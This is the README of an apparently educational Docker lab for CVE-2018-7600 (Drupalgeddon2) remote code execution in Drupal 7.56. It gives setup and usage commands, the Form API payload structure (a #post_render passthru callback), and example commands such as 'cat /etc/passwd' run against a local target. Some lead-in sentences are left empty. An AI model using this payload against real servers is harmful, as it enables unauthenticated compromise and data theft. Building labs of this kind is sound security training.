Laboratório educacional que demonstra execução remota de código da CVE-2018-7600 (Drupalgeddon2) utilizando um ambiente Drupal 7.56 vulnerável baseado em Docker.
Laboratório educacional demonstrando exploração do CVE-2018-7600 (Drupalgeddon2) usando um ambiente Drupal 7.56 vulnerável implantado com Docker.
Este projeto simula um fluxo de trabalho real de avaliação de vulnerabilidades, incluindo:
CVE-2018-7600 (Drupalgeddon2) é uma vulnerabilidade crítica de Execução Remota de Código (RCE) no CMS Drupal.
O problema existe na API de Formulários do Drupal, onde entradas controladas pelo usuário podem ser interpretadas como arrays de renderização, permitindo que atacantes injetem callbacks maliciosos, como:
Isso leva à execução de comandos sem autenticação no servidor.
Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database
cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│ └── docker-compose.yml
│
├── screenshots/
│ ├── drupal-dashboard.png
│ ├── drupal-version.png
│ └── rce-output.png
│
├── logs/
│ ├── scan_results.txt
│ └── exploit_log.txt
│
├── payloads/
│ └── payload-list.txt
│
├── report/
│ └── drupalgeddon2-report.pdf


git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab
docker compose up -d
http://localhost:8080
python3 scan.py http://localhost:8080
Exemplo de saída:
[~] Scanning http://localhost:8080... VULNERABLE
python3 exploit.py http://localhost:8080 id
Exemplo de saída:
uid=33(www-data) gid=33(www-data)
Estrutura básica de payload usada:
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami
Exemplos de comandos:
whoami
id
cat /etc/passwd
Lista completa de payloads disponível em:
payloads/payload-list.txt
Para manter uma estrutura de repositório limpa e profissional:
Essa separação garante:
Este laboratório é destinado a:
Este projeto é apenas para fins educacionais e de pesquisa.
Não tente explorar sistemas sem autorização explícita.
Os autores não são responsáveis pelo uso indevido.